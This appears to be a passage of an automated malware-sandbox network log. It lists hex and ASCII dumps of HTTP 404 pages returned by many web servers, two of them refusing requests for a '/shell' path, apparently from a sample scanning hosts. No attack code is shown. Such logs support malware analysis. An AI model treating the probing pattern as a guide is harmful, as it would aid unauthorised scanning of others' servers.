Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.17.1Date: Sat, 19 Feb 2022 15:05:21 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.17.1</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:05:32 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:05:33 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:05:37 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:05:51 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:05:54 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:05:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Sat, 19 Feb 2022 15:05:54 GMTContent-Type: text/htmlContent-Length: 3650Connection: keep-aliveETag: "5f9e16e8-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 19 Feb 2022 15:05:57 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:05:57 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-rcDate: Sat, 19 Feb 2022 15:06:03 GMTContent-Type: text/htmlContent-Length: 1091Connection: keep-aliveVary: Accept-EncodingETag: "6118a5b0-443"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 6f 42 61 63 6b 28 29 20 7b 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 20 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 2e 77 72 61 70 7b 20 77 69 64 74 68 3a 31 30 30 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 7d 2e 6c 6f 67 6f 7b 20 77 69 64 74 68 3a 34 33 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 32 35 25 3b 20 6c 65 66 74 3a 33 35 25 3b 7d 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 70 78 3b 7d 70 20 61 7b 20 63 6f 6c 6f 72 3a 23 65 65 65 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 20 70 61 64 64 69 6e 67 3a 35 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 33 33 36 36 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 65 6d 3b 20 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 65 6d 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 65 6d 3b 7d 70 20 61 3a 68 6f 76 65 72 7b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 7d 2e 66 6f 6f 74 65 72 7b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 20 72 69 67 68 74 3a 31 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 63 6f 6c 6f 72 3a 23 61 61 61 3b 7d 2e 66 6f 6f 74 65 72 20 61 7b 20 63 6f 6c 6f 72 3a 23 36 36 36 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 20 3c 68 31 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 57 65 62 73 69 74 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 20 54 68 65 20 77 65 62 73 69 74 65 20 79 6f 75 20 61 72 65 20 74 72 79 69 6e 67 20 74 6f 20 72 65 61 63 68 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 2f 70 3e 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Sat, 19 Feb 2022 10:06:02 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 75 74 69 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 6f 6e 4c 6f 61 64 3d 27 6c 6f 67 6f 75 74 32 28 29 27 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><script language="javascript" src="util.js"></script></HEAD><BODY onLoad='logout2()' BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 15:06:09 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:07 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:06:07 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.4.6 (Ubuntu)Date: Sat, 19 Feb 2022 15:06:07 GMTContent-Type: text/htmlContent-Length: 177Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 36 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.4.6 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:08 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 15:06:09 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:08 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
